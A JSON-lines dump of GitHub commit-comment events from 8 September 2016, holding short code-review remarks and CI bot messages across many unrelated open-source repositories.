{"id":"4533810266","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":18944386,"position":null,"line":null,"path":null,"commit_id":"d37ab8889af90c2c3b459fd90fd28a3394d0a26b","created_at":"2016-09-08T12:55:57Z","updated_at":"2016-09-08T12:55:57Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 964](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=12925&buildTypeId=ota_plus_RviSotaServer_Ci) outcome was **FAILURE**\nSummary: Exit code 1 (new) Build time: 00:01:28"}},"created_at":"2016-09-08T12:55:57Z"}
{"id":"4533812945","type":"CommitCommentEvent","actor":{"login":"cescoffier"},"repo":{"name":"cescoffier/vertx-cache"},"payload":{"comment":{"id":18944390,"position":null,"line":null,"path":null,"commit_id":"7ac6c9cf6bae13fb62203dbf3ec52dd8af9d2401","created_at":"2016-09-08T12:56:27Z","updated_at":"2016-09-08T12:56:27Z","body":"Exactly. "}},"created_at":"2016-09-08T12:56:27Z"}
{"id":"4533813690","type":"CommitCommentEvent","actor":{"login":"alban"},"repo":{"name":"alban/linux"},"payload":{"comment":{"id":18944395,"position":4,"line":249,"path":"drivers/connector/cn_proc.c","commit_id":"8a5ce0ab82efa45f0c6ff5a80f9434d149b769bf","created_at":"2016-09-08T12:56:35Z","updated_at":"2016-09-08T12:56:35Z","body":"Mistake "}},"created_at":"2016-09-08T12:56:35Z"}
{"id":"4533814756","type":"CommitCommentEvent","actor":{"login":"1606858560"},"repo":{"name":"1606858560/os162"},"payload":{"comment":{"id":18944398,"position":null,"line":null,"path":null,"commit_id":"8c346feb5e4547ae91746f9a0807fb87d7f489a7","created_at":"2016-09-08T12:56:45Z","updated_at":"2016-09-08T12:56:45Z","body":"week 1 task"}},"created_at":"2016-09-08T12:56:45Z"}
{"id":"4533818636","type":"CommitCommentEvent","actor":{"login":"pgundlach"},"repo":{"name":"speedata/hyphenation"},"payload":{"comment":{"id":18944409,"position":1,"line":1,"path":"Readme.md","commit_id":"da9f06d81fcd3b06b44ac4decdfcf8ace3135bf1","created_at":"2016-09-08T12:57:28Z","updated_at":"2016-09-08T12:57:28Z","body":"It's a long term project and only parts of TeX will be ported (only the algorithms and node stuff, but not the input language)"}},"created_at":"2016-09-08T12:57:28Z"}
{"id":"4533825900","type":"CommitCommentEvent","actor":{"login":"rscipien"},"repo":{"name":"rscipien/zap-extensions"},"payload":{"comment":{"id":18944424,"position":62,"line":62,"path":"test/org/zaproxy/zap/extension/pscanrulesBeta/CharsetMismatchScannerUnitTest.java","commit_id":"648b2e687de16835f78b7462b76d68ebabd50335","created_at":"2016-09-08T12:58:48Z","updated_at":"2016-09-08T12:58:48Z","body":"For now not but all alerts levels are set to AlertThreshold.LOW in CharsetMismatchScanner. There is comment about [possible alert](https://github.com/zaproxy/zap-extensions/blob/beta/src/org/zaproxy/zap/extension/pscanrulesBeta/CharsetMismatchScanner.java#L95) if it will added we will not catch that because by default in PluginPassiveScanner alert level is set to AlertThreshold.MEDIUM. Maybe level should be set before each test ?"}},"created_at":"2016-09-08T12:58:48Z"}
{"id":"4533827341","type":"CommitCommentEvent","actor":{"login":"gquintard"},"repo":{"name":"varnishcache/varnish-cache"},"payload":{"comment":{"id":18944429,"position":null,"line":null,"path":null,"commit_id":"f70bcbc490121e21b227330ebb2a19cd477bb10c","created_at":"2016-09-08T12:59:06Z","updated_at":"2016-09-08T12:59:06Z","body":"thanks, fixed in master"}},"created_at":"2016-09-08T12:59:06Z"}
{"id":"4533830170","type":"CommitCommentEvent","actor":{"login":"lintr-bot"},"repo":{"name":"dirkschumacher/ompr"},"payload":{"comment":{"id":18944436,"position":null,"line":null,"path":null,"commit_id":"36be72d51b73056fedc3898b29eac8feb5092d90","created_at":"2016-09-08T12:59:34Z","updated_at":"2016-09-08T12:59:34Z","body":"[R/class-model.R:307:1:](https://github.com/dirkschumacher/ompr/blob/36be72d51b73056fedc3898b29eac8feb5092d90/R/class-model.R#L307) *style:* **lines should not be more than 80 characters.**\n```r\n​                \"Take a look at one of the vignettes on how to call solve_model.\"))\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```"}},"created_at":"2016-09-08T12:59:34Z"}
{"id":"4533840976","type":"CommitCommentEvent","actor":{"login":"oddhack"},"repo":{"name":"KhronosGroup/Vulkan-LoaderAndValidationLayers"},"payload":{"comment":{"id":18944452,"position":null,"line":null,"path":null,"commit_id":"0cf28a250c117cb1d11426ddc75c0327297e32e7","created_at":"2016-09-08T13:01:31Z","updated_at":"2016-09-08T13:01:31Z","body":"@dustin-lunarg you may have noticed already, but the XML schema & contents have been updated to add the required sType value as an XML attribute."}},"created_at":"2016-09-08T13:01:31Z"}
{"id":"4533841823","type":"CommitCommentEvent","actor":{"login":"rscipien"},"repo":{"name":"rscipien/zap-extensions"},"payload":{"comment":{"id":18944455,"position":124,"line":124,"path":"test/org/zaproxy/zap/extension/pscanrulesBeta/CharsetMismatchScannerUnitTest.java","commit_id":"648b2e687de16835f78b7462b76d68ebabd50335","created_at":"2016-09-08T13:01:40Z","updated_at":"2016-09-08T13:01:40Z","body":"Count of alert is sufficient for testing ? Maybe we should check for type of error too ?"}},"created_at":"2016-09-08T13:01:40Z"}
{"id":"4533848241","type":"CommitCommentEvent","actor":{"login":"oddhack"},"repo":{"name":"KhronosGroup/Vulkan-LoaderAndValidationLayers"},"payload":{"comment":{"id":18944474,"position":null,"line":null,"path":null,"commit_id":"0cf28a250c117cb1d11426ddc75c0327297e32e7","created_at":"2016-09-08T13:02:51Z","updated_at":"2016-09-08T13:02:51Z","body":"BTW if there is more information that you would find useful in the XML for validation layer generation, please open an issue in the Vulkan gitlab repo. No promises but I think @TobiasHector and I are both receptive to that as long as it's not terribly intrusive on the schema / contents."}},"created_at":"2016-09-08T13:02:51Z"}
{"id":"4533856564","type":"CommitCommentEvent","actor":{"login":"hroncok"},"repo":{"name":"cvut/MI-PYT"},"payload":{"comment":{"id":18944484,"position":335,"line":335,"path":"tutorials/01_requests_click.md","commit_id":"283251ba5b5d450a61373d576efa4dfa3fbf6984","created_at":"2016-09-08T13:04:26Z","updated_at":"2016-09-08T13:04:26Z","body":"Pošli prosím pull requesty :)"}},"created_at":"2016-09-08T13:04:26Z"}
{"id":"4533856905","type":"CommitCommentEvent","actor":{"login":"bwoebi"},"repo":{"name":"amphp/aerys"},"payload":{"comment":{"id":18944487,"position":null,"line":null,"path":null,"commit_id":"aa9d0b990e335f945355b5c8251d82a0aab78d48","created_at":"2016-09-08T13:04:29Z","updated_at":"2016-09-08T13:04:29Z","body":"Why do you rethrow these Coroutines? They all have their own catch all handlers redirecting to `$this->onAppError()`. These coroutines never will throw."}},"created_at":"2016-09-08T13:04:29Z"}
{"id":"4533870074","type":"CommitCommentEvent","actor":{"login":"bwoebi"},"repo":{"name":"amphp/aerys"},"payload":{"comment":{"id":18944540,"position":null,"line":null,"path":null,"commit_id":"0cd26e59b4bcc691acac5fc91faf4e65e6ed8db5","created_at":"2016-09-08T13:06:56Z","updated_at":"2016-09-08T13:06:56Z","body":"When will a ClientException be thrown in onClose() and it _not_ be a programmer error? You must _not_ communicate with the Client in onClose(). That's a bug and should not be swallowed."}},"created_at":"2016-09-08T13:06:56Z"}
{"id":"4533872468","type":"CommitCommentEvent","actor":{"login":"Suremaker"},"repo":{"name":"williamlord/HealthMonitoring"},"payload":{"comment":{"id":18944546,"position":36,"line":1,"path":"HealthMonitoring.Api.UnitTests/Properties/AssemblyInfo.cs","commit_id":"2256c7cb093125d5cf351bddb41f4deebeb18551","created_at":"2016-09-08T13:07:24Z","updated_at":"2016-09-08T13:07:24Z","body":"please restore"}},"created_at":"2016-09-08T13:07:24Z"}
{"id":"4533875254","type":"CommitCommentEvent","actor":{"login":"baidu-paddle-QA"},"repo":{"name":"baidu-paddle-QA/hello-world"},"payload":{"comment":{"id":18944550,"position":null,"line":null,"path":null,"commit_id":"2bda1b8c6140a9351f731627d588ae811dfb6ae4","created_at":"2016-09-08T13:07:55Z","updated_at":"2016-09-08T13:07:55Z","body":"test"}},"created_at":"2016-09-08T13:07:55Z"}
{"id":"4533876076","type":"CommitCommentEvent","actor":{"login":"baidu-paddle-QA"},"repo":{"name":"baidu-paddle-QA/hello-world"},"payload":{"comment":{"id":18944553,"position":null,"line":null,"path":null,"commit_id":"2bda1b8c6140a9351f731627d588ae811dfb6ae4","created_at":"2016-09-08T13:08:03Z","updated_at":"2016-09-08T13:08:03Z","body":"sss"}},"created_at":"2016-09-08T13:08:03Z"}
{"id":"4533878116","type":"CommitCommentEvent","actor":{"login":"Vlandmist"},"repo":{"name":"PatrickRorth/Twitch.TV"},"payload":{"comment":{"id":18944559,"position":null,"line":null,"path":null,"commit_id":"945915206f329b9646314afa1956e9940365338b","created_at":"2016-09-08T13:08:24Z","updated_at":"2016-09-08T13:08:24Z","body":"I'm using JSONP right now to retrieve from my php script. I'm unsure whether it would work when I call http://usher.twitch.tv..... I should give it a more serious try.\r\n\r\nDo you have experience with WebOS JS services?"}},"created_at":"2016-09-08T13:08:24Z"}
{"id":"4533879162","type":"CommitCommentEvent","actor":{"login":"IIvec"},"repo":{"name":"pb00068/Stockfish"},"payload":{"comment":{"id":18944561,"position":null,"line":null,"path":null,"commit_id":"fe65ba628f2d6a84d469450cfd3265ef7b0b957b","created_at":"2016-09-08T13:08:36Z","updated_at":"2016-09-08T13:08:36Z","body":"Hmm, I bet that in optimal code these formulas will be sublinear, let alone quadratic. Sorry for teasing, but I smell lots of elo undiscovered in history reductions. Many search formulas, and especially history reductions should be tested on VLTC."}},"created_at":"2016-09-08T13:08:36Z"}
{"id":"4533879965","type":"CommitCommentEvent","actor":{"login":"andres-erbsen"},"repo":{"name":"andres-erbsen/pika-yfncc-cdist"},"payload":{"comment":{"id":18944562,"position":5,"line":120,"path":"cdist/conf/manifest/pika-web.mit.edu","commit_id":"d5588a7e378cc98a7fda6dc95ed18dceb5d1176d","created_at":"2016-09-08T13:08:45Z","updated_at":"2016-09-08T13:08:45Z","body":"It is probably a good idea to squash sequential commits of semantically similar modifications to large binary files."}},"created_at":"2016-09-08T13:08:45Z"}
{"id":"4533882055","type":"CommitCommentEvent","actor":{"login":"romanzolotarev"},"repo":{"name":"jackhumbert/qmk_firmware"},"payload":{"comment":{"id":18944567,"position":35,"line":23,"path":"keyboards/ergodox/keymaps/romanzolotarev-norman-osx/readme.md","commit_id":"da16733e7ab66ebd27fde21312990f5733966a52","created_at":"2016-09-08T13:09:10Z","updated_at":"2016-09-08T13:09:10Z","body":"Oops! Thank you."}},"created_at":"2016-09-08T13:09:10Z"}
{"id":"4533883364","type":"CommitCommentEvent","actor":{"login":"mmoreram"},"repo":{"name":"sourcerer-mike/crmp"},"payload":{"comment":{"id":18944570,"position":25,"line":25,"path":"src/Crmp/CrmBundle/DomainRepository/Addresses.php","commit_id":"89adfcfdb44dc141cb1d7dde237deb3b7a619308","created_at":"2016-09-08T13:09:24Z","updated_at":"2016-09-08T13:09:24Z","body":"You don't need CQRS if you want to remove all your logic from your commands. Just place your login in a set of services (simple classes with simple methods) and then... use them :)\r\nTake in account that using the command bus, for example, you will not be able to use autogenerated UUID, so the commands will never return you any result (just an example)..."}},"created_at":"2016-09-08T13:09:24Z"}
{"id":"4533885222","type":"CommitCommentEvent","actor":{"login":"JacquesCarette"},"repo":{"name":"hakaru-dev/hakaru"},"payload":{"comment":{"id":18944572,"position":null,"line":null,"path":null,"commit_id":"813de8e15cd48f37f068ebc873789cf8634fb822","created_at":"2016-09-08T13:09:45Z","updated_at":"2016-09-08T13:09:45Z","body":"Right, so we should document that.  You are right that \"on weight\" is false.  But \"things known to Maple\" wasn't too far off.  We could give it a negative description (i.e. does not contain `applyintegrand`, which we could even explicitly test for, as a sanity check."}},"created_at":"2016-09-08T13:09:45Z"}
{"id":"4533887068","type":"CommitCommentEvent","actor":{"login":"jaycopeland"},"repo":{"name":"jaycopeland/Opera-data-publication-project"},"payload":{"comment":{"id":18944573,"position":null,"line":null,"path":null,"commit_id":"f152b41fffcc7bd6c761ce8f15529a562103beab","created_at":"2016-09-08T13:10:04Z","updated_at":"2016-09-08T13:10:04Z","body":"Kevin Quick's script, slightly modified to use paths on the fileserver."}},"created_at":"2016-09-08T13:10:04Z"}
{"id":"4533893999","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":18944584,"position":null,"line":null,"path":null,"commit_id":"fba644359dbaf4bd81acf5b04e6ab749ce786b2d","created_at":"2016-09-08T13:11:20Z","updated_at":"2016-09-08T13:11:20Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 965](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=12932&buildTypeId=ota_plus_RviSotaServer_Ci) is now running\n"}},"created_at":"2016-09-08T13:11:20Z"}
{"id":"4533894347","type":"CommitCommentEvent","actor":{"login":"mhebing"},"repo":{"name":"paneldata/gip"},"payload":{"comment":{"id":18944586,"position":null,"line":null,"path":null,"commit_id":"f601968ef7f63620e0e9ffe74e222ed8b441abd4","created_at":"2016-09-08T13:11:24Z","updated_at":"2016-09-08T13:11:24Z","body":"close #2"}},"created_at":"2016-09-08T13:11:24Z"}
{"id":"4533894444","type":"CommitCommentEvent","actor":{"login":"TrySound"},"repo":{"name":"blesh/symbol-observable"},"payload":{"comment":{"id":18944587,"position":4,"line":4,"path":"es/index.js","commit_id":"7a41de9d83d2e8ecddc4fdda6f1d3b2182f61053","created_at":"2016-09-08T13:11:24Z","updated_at":"2016-09-08T13:11:24Z","body":"es modules doesn't have own context. And top-level `this` keyword compiles to `undefined` by rollup. It's possible to set `context` option. But it's a hack. Let's do something like this\r\n```\r\nvar root = typeof global !== undefined ? global : window;\r\n```"}},"created_at":"2016-09-08T13:11:24Z"}
{"id":"4533896127","type":"CommitCommentEvent","actor":{"login":"jaycopeland"},"repo":{"name":"jaycopeland/Opera-data-publication-project"},"payload":{"comment":{"id":18944589,"position":null,"line":null,"path":null,"commit_id":"8e33842a3955f1b5c863855070be1325716ac577","created_at":"2016-09-08T13:11:42Z","updated_at":"2016-09-08T13:11:42Z","body":"need to specify the full path"}},"created_at":"2016-09-08T13:11:42Z"}
{"id":"4533897600","type":"CommitCommentEvent","actor":{"login":"mhebing"},"repo":{"name":"paneldata/pairfam"},"payload":{"comment":{"id":18944591,"position":null,"line":null,"path":null,"commit_id":"f2916ba1c37a0d69dae71d7d322b4e561ce65a0f","created_at":"2016-09-08T13:11:59Z","updated_at":"2016-09-08T13:11:59Z","body":"#2"}},"created_at":"2016-09-08T13:11:59Z"}
{"id":"4533897736","type":"CommitCommentEvent","actor":{"login":"vamposdecampos"},"repo":{"name":"superCodrut/strongswan"},"payload":{"comment":{"id":18944592,"position":33,"line":301,"path":"src/libcharon/plugins/save_keys/save_keys_listener.c","commit_id":"46c54e7e9dd193488592998c92b4f49d6bd22db7","created_at":"2016-09-08T13:12:01Z","updated_at":"2016-09-08T13:12:01Z","body":"This truncates the file every time."}},"created_at":"2016-09-08T13:12:01Z"}
{"id":"4533898283","type":"CommitCommentEvent","actor":{"login":"DevPixbo"},"repo":{"name":"StenaIT/carl-guild-group2-chat"},"payload":{"comment":{"id":18944595,"position":12,"line":12,"path":"public/test.html","commit_id":"780ca9fc9e29a73d0afbc9a4b4ee9f51fa91b66b","created_at":"2016-09-08T13:12:09Z","updated_at":"2016-09-08T13:12:09Z","body":"Just testing;) @nabrink "}},"created_at":"2016-09-08T13:12:09Z"}
{"id":"4533899597","type":"CommitCommentEvent","actor":{"login":"vamposdecampos"},"repo":{"name":"superCodrut/strongswan"},"payload":{"comment":{"id":18944598,"position":33,"line":301,"path":"src/libcharon/plugins/save_keys/save_keys_listener.c","commit_id":"46c54e7e9dd193488592998c92b4f49d6bd22db7","created_at":"2016-09-08T13:12:23Z","updated_at":"2016-09-08T13:12:23Z","body":"fopen() may file, need to check error code."}},"created_at":"2016-09-08T13:12:23Z"}
{"id":"4533900295","type":"CommitCommentEvent","actor":{"login":"cahirwpz"},"repo":{"name":"cahirwpz/mimiker"},"payload":{"comment":{"id":18944600,"position":null,"line":null,"path":null,"commit_id":"de809280536175a3e0cedf7f700bd204b6500e2d","created_at":"2016-09-08T13:12:30Z","updated_at":"2016-09-08T13:12:30Z","body":"@coodie There're several important features missing in pmap and I'd like you to implement them.\r\n\r\nPlease note, we're ignoring cache effects for now. Eventually we'll start OVPsim with cache simulation enabled, which can cause whole range of problems to emerge.\r\n\r\n> Implement `pmap_switch` and test it.\r\n\r\nThe test should create two user pmap's and map different physical memory into the same virtual address range in both pmap's. This should be fairly easy. Push the change directly into master.\r\n\r\n> We're missing `pmap_remove_pde` which prevents page table from shrinking (after `pmap_unmap`).\r\n\r\nDo it in a separate branch. I think that you need an extra counter for each PDE to implement it.\r\n\r\n> REFERENCED and MODIFIED bits for pages.\r\n\r\nPlease think it through and consult with me before an attempt to implement it. We can either make use of unused ENTRYLO bits to store extra information or extend page table, so PTEs are 8 byte long instead of 4."}},"created_at":"2016-09-08T13:12:30Z"}
{"id":"4533906584","type":"CommitCommentEvent","actor":{"login":"vamposdecampos"},"repo":{"name":"superCodrut/strongswan"},"payload":{"comment":{"id":18944608,"position":38,"line":194,"path":"src/libcharon/plugins/save_keys/save_keys_listener.c","commit_id":"d772e39256240e673fb9976b215fca778dbb4103","created_at":"2016-09-08T13:13:33Z","updated_at":"2016-09-08T13:13:33Z","body":"This truncates the file -- we probably want to append.  Also need to check return value for errors."}},"created_at":"2016-09-08T13:13:33Z"}
{"id":"4533907416","type":"CommitCommentEvent","actor":{"login":"vamposdecampos"},"repo":{"name":"superCodrut/strongswan"},"payload":{"comment":{"id":18944612,"position":37,"line":177,"path":"src/libcharon/plugins/save_keys/save_keys_listener.c","commit_id":"3ed81a417e57599c9ba8abbb752eb8f74ea62fde","created_at":"2016-09-08T13:13:41Z","updated_at":"2016-09-08T13:13:41Z","body":"This truncates the file -- we probably want to append.  Also need to check return value for errors."}},"created_at":"2016-09-08T13:13:41Z"}
{"id":"4533907619","type":"CommitCommentEvent","actor":{"login":"oznetmaster"},"repo":{"name":"nunit/nunit"},"payload":{"comment":{"id":18944614,"position":null,"line":null,"path":null,"commit_id":"65f0b974cb65a6588a54de96f0ce929f57e39f59","created_at":"2016-09-08T13:13:43Z","updated_at":"2016-09-08T13:13:43Z","body":"I was pretty sure that when I added Linq to 2.0, The Action and Func definitions were there as well.  That was why I asked if they had been removed."}},"created_at":"2016-09-08T13:13:43Z"}
{"id":"4533908029","type":"CommitCommentEvent","actor":{"login":"jkanche"},"repo":{"name":"jkanche/epiviz-chart-to-polymer"},"payload":{"comment":{"id":18944616,"position":null,"line":null,"path":null,"commit_id":"c5bd2f4b6988eac9555a8760bfc6b73f5bfe0334","created_at":"2016-09-08T13:13:47Z","updated_at":"2016-09-08T13:13:47Z","body":"also has epiviz-custom-scatter-plot"}},"created_at":"2016-09-08T13:13:47Z"}
{"id":"4533910940","type":"CommitCommentEvent","actor":{"login":"JacquesCarette"},"repo":{"name":"hakaru-dev/hakaru"},"payload":{"comment":{"id":18944621,"position":null,"line":null,"path":null,"commit_id":"8b5a8f9bd5b4ad49e69a5c4f0c04a4c48f3b1feb","created_at":"2016-09-08T13:14:19Z","updated_at":"2016-09-08T13:14:19Z","body":"Yes. `csgn` is still called, but much earlier in the computation, and so prunes useless branches early.  This is almost always a good thing.\r\n\r\nI guess what I am converging to is that it would be good if `f` was `int_assuming` instead of `int` (where `int_assuming` is the obvious new routine) which would have a calling convention closer to that of `ints` and `sums`."}},"created_at":"2016-09-08T13:14:19Z"}
{"id":"4533910982","type":"CommitCommentEvent","actor":{"login":"oznetmaster"},"repo":{"name":"nunit/nunit"},"payload":{"comment":{"id":18944622,"position":null,"line":null,"path":null,"commit_id":"65f0b974cb65a6588a54de96f0ce929f57e39f59","created_at":"2016-09-08T13:14:19Z","updated_at":"2016-09-08T13:14:19Z","body":"Users chosing the 2.0 build would not have expected to use Linq either, but we decided to add that for them."}},"created_at":"2016-09-08T13:14:19Z"}
{"id":"4533912035","type":"CommitCommentEvent","actor":{"login":"acrm"},"repo":{"name":"EkaSe/HelloWorld"},"payload":{"comment":{"id":18944627,"position":14,"line":0,"path":"HelloWorld/Program.cs","commit_id":"24986ebf284e88147a01a5ce6ca449f9460c5b0c","created_at":"2016-09-08T13:14:30Z","updated_at":"2016-09-08T13:14:30Z","body":"Нюанс решения задач с помощью компьютера в том, что все наши формулы, весь наш алгоритм является одной большой секцией \"решение\", в который мы описываем компьютеру, как нужно проводить вычисления, чтобы получить требуемый результат. Мы можем в нашем алгоритме выделить блок ввода данных и блок возвращаемых данных, но все что не относится к этим подблокам - это\" решение\")"}},"created_at":"2016-09-08T13:14:30Z"}
{"id":"4533915972","type":"CommitCommentEvent","actor":{"login":"vamposdecampos"},"repo":{"name":"superCodrut/strongswan"},"payload":{"comment":{"id":18944639,"position":6,"line":145,"path":"src/libcharon/plugins/save_keys/save_keys_listener.c","commit_id":"a88bc6f0bb37264f3b1798c61efe8cabb49f0440","created_at":"2016-09-08T13:15:15Z","updated_at":"2016-09-08T13:15:15Z","body":"We may want to chunk_clear() the previous values, if any."}},"created_at":"2016-09-08T13:15:15Z"}
{"id":"4533917224","type":"CommitCommentEvent","actor":{"login":"zapelin"},"repo":{"name":"zapelin/collab-github-v2"},"payload":{"comment":{"id":18944640,"position":null,"line":null,"path":null,"commit_id":"b35cfe376c066398fcc1fbde106c2b6e5f862b28","created_at":"2016-09-08T13:15:26Z","updated_at":"2016-09-08T13:15:26Z","body":"Collaborator:\nA review for this commit was created. [Link to review](http://localhost:8080/ui#review:id=959)"}},"created_at":"2016-09-08T13:15:26Z"}
{"id":"4533918538","type":"CommitCommentEvent","actor":{"login":"ader1990"},"repo":{"name":"cosminmocan/heat-templates"},"payload":{"comment":{"id":18944643,"position":40,"line":173,"path":"hot/Windows/MSSQLServer/MSSQL.psm1","commit_id":"27d6c52e22d9a3f5533131fbda2f47234dc7ec5c","created_at":"2016-09-08T13:15:39Z","updated_at":"2016-09-08T13:15:39Z","body":" (Get-Volume -DiskImage $iso).DriveLetter is used twice -- you can remove the double usage of this line using a variable:\r\n\r\n$driveLetter = (Get-Volume -DiskImage $iso).DriveLetter"}},"created_at":"2016-09-08T13:15:39Z"}
{"id":"4533919453","type":"CommitCommentEvent","actor":{"login":"Kori-no-Otoko"},"repo":{"name":"Kori-no-Otoko/ForgetMeNot"},"payload":{"comment":{"id":18944645,"position":16,"line":91,"path":"CodeTN 2016-1/indexV01.html","commit_id":"4bed919d6085350cd5b1342bea8c4d6e9a0661a9","created_at":"2016-09-08T13:15:48Z","updated_at":"2016-09-08T13:15:48Z","body":"What?\r\n\r\nthis is kinda broken..."}},"created_at":"2016-09-08T13:15:48Z"}
{"id":"4533920743","type":"CommitCommentEvent","actor":{"login":"daniel-ziegler"},"repo":{"name":"andres-erbsen/pika-yfncc-cdist"},"payload":{"comment":{"id":18944648,"position":5,"line":120,"path":"cdist/conf/manifest/pika-web.mit.edu","commit_id":"d5588a7e378cc98a7fda6dc95ed18dceb5d1176d","created_at":"2016-09-08T13:16:02Z","updated_at":"2016-09-08T13:16:02Z","body":"Sounds good; I'll push less often and do that in the future"}},"created_at":"2016-09-08T13:16:02Z"}
{"id":"4533923823","type":"CommitCommentEvent","actor":{"login":"pdube"},"repo":{"name":"pdube/node-dominos-pizza-api"},"payload":{"comment":{"id":18944652,"position":null,"line":null,"path":null,"commit_id":"7f49bae9224eacdc1a1cbb19c873a03ab777f9c9","created_at":"2016-09-08T13:16:32Z","updated_at":"2016-09-08T13:16:32Z","body":"I opened up a PR"}},"created_at":"2016-09-08T13:16:32Z"}
{"id":"4533931348","type":"CommitCommentEvent","actor":{"login":"yweng8111"},"repo":{"name":"yweng8111/hr"},"payload":{"comment":{"id":18944705,"position":null,"line":null,"path":null,"commit_id":"6d5ccee0c64b544c97bfea44c4716f3100d888b4","created_at":"2016-09-08T13:17:48Z","updated_at":"2016-09-08T13:17:48Z","body":"Thanks for the quick response, actually I also don't need this module. I'm just try to port other oca-hr modules for v9. With just a few corrects in view definition some modules like hr_contract_state can be installed in odoo v9. But it has an old indirect dependence on hr_employee_state. :("}},"created_at":"2016-09-08T13:17:48Z"}
{"id":"4533931611","type":"CommitCommentEvent","actor":{"login":"greut"},"repo":{"name":"HE-Arc/php-intro-framework"},"payload":{"comment":{"id":18944707,"position":null,"line":null,"path":null,"commit_id":"04c67a529a0f59838c222f1ef20497e3a313bfc5","created_at":"2016-09-08T13:17:52Z","updated_at":"2016-09-08T13:17:52Z","body":"oulà... :beers: "}},"created_at":"2016-09-08T13:17:52Z"}
{"id":"4533933289","type":"CommitCommentEvent","actor":{"login":"IntelOrca"},"repo":{"name":"IntelOrca/OpenRCT2"},"payload":{"comment":{"id":18944712,"position":128,"line":337,"path":"src/rct1.h","commit_id":"193309025696cd7476768673f400b48f33ac3d33","created_at":"2016-09-08T13:18:12Z","updated_at":"2016-09-08T13:18:12Z","body":"amended "}},"created_at":"2016-09-08T13:18:12Z"}
{"id":"4533934850","type":"CommitCommentEvent","actor":{"login":"ashleydavies"},"repo":{"name":"mbellgb/hc2016-project"},"payload":{"comment":{"id":18944713,"position":null,"line":null,"path":null,"commit_id":"d1d22dd826c98e84e20dd543c97283ae3511fa04","created_at":"2016-09-08T13:18:28Z","updated_at":"2016-09-08T13:18:28Z","body":"when your fix was so good it unfixed it"}},"created_at":"2016-09-08T13:18:28Z"}
{"id":"4533937146","type":"CommitCommentEvent","actor":{"login":"thecristen"},"repo":{"name":"codeforboston/cambridge_voting_locations"},"payload":{"comment":{"id":18944716,"position":null,"line":null,"path":null,"commit_id":"a5bb091cb4e03226fb80f7c9d61fbb2a2e85fdb2","created_at":"2016-09-08T13:18:51Z","updated_at":"2016-09-08T13:18:51Z","body":"nice.\r\nFYI if you put \"fixes #25\" or somesuch in the commit message, Github can automagically close that associated issue once it's merged into the default branch ([info here](https://help.github.com/articles/closing-issues-via-commit-messages/))."}},"created_at":"2016-09-08T13:18:51Z"}
{"id":"4533938918","type":"CommitCommentEvent","actor":{"login":"Dima73"},"repo":{"name":"OpenPLi/enigma2"},"payload":{"comment":{"id":18944720,"position":null,"line":null,"path":null,"commit_id":"a87fad70b9d2ec45de8e8967a5ccad1e255e962b","created_at":"2016-09-08T13:19:11Z","updated_at":"2016-09-08T13:19:11Z","body":"mmc(sd card) used formuler/zgemma box"}},"created_at":"2016-09-08T13:19:11Z"}
{"id":"4533941179","type":"CommitCommentEvent","actor":{"login":"ivanbuhov"},"repo":{"name":"NativeScript/ios-runtime"},"payload":{"comment":{"id":18944723,"position":91,"line":70,"path":"src/NativeScript/Workers/WorkerThread.mm","commit_id":"10fca84d7db298422faf75c466d88ba2f551074c","created_at":"2016-09-08T13:19:35Z","updated_at":"2016-09-08T13:19:35Z","body":"Why not using `CFRunLoopRunInMode` which runs the current thread runloop (the runloop returned by `CFRunLoopGetCurrent()`)? Some iOS APIs enqueue work on the current runloop. In case we are using other runloop (e.g. `WTF::RunLoop`) this work will never be executed. An example is the `NSTimer` class:\r\n\r\n```\r\nvar timer = NSTimer.scheduledTimerWithTimeIntervalTargetSelectorUserInfoRepeats(2, this, \"logMessage\", null, true);\r\n```\r\nThe `logMessage` call is enqueued on the current runloop, so it will be called repeatedly only if the current runloop is actually running."}},"created_at":"2016-09-08T13:19:35Z"}
{"id":"4533941705","type":"CommitCommentEvent","actor":{"login":"acrm"},"repo":{"name":"EkaSe/HelloWorld"},"payload":{"comment":{"id":18944726,"position":28,"line":0,"path":"HelloWorld/Program.cs","commit_id":"24986ebf284e88147a01a5ce6ca449f9460c5b0c","created_at":"2016-09-08T13:19:42Z","updated_at":"2016-09-08T13:19:42Z","body":"Соответственно, отдельного блока \"вычисления\" вообще нет в программе. Вычисление - это то, что произойдет когда программа уже будет запущена. Причем вычислением будет все выполнение программы, а не какой-то ее отдельной части. "}},"created_at":"2016-09-08T13:19:42Z"}
{"id":"4533949324","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":18944742,"position":null,"line":null,"path":null,"commit_id":"fba644359dbaf4bd81acf5b04e6ab749ce786b2d","created_at":"2016-09-08T13:21:05Z","updated_at":"2016-09-08T13:21:05Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 965](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=12932&buildTypeId=ota_plus_RviSotaServer_Ci) outcome was **SUCCESS**\nSummary: Tests passed: 237, ignored: 3 Build time: 00:09:44"}},"created_at":"2016-09-08T13:21:05Z"}
{"id":"4533949446","type":"CommitCommentEvent","actor":{"login":"abeals"},"repo":{"name":"appsembler/edx-platform"},"payload":{"comment":{"id":18944743,"position":41,"line":41,"path":"lms/lib/courseware_search/lms_course_discovery_results_processor.py","commit_id":"eff436c002c68569f495ca794431823cabd8dfa2","created_at":"2016-09-08T13:21:06Z","updated_at":"2016-09-08T13:21:06Z","body":"So staff members will see all courses in search? I think this makes sense, but will make it hard for staff members to view the search results as the users will see it, potentially leading to false-positive bug reports."}},"created_at":"2016-09-08T13:21:06Z"}
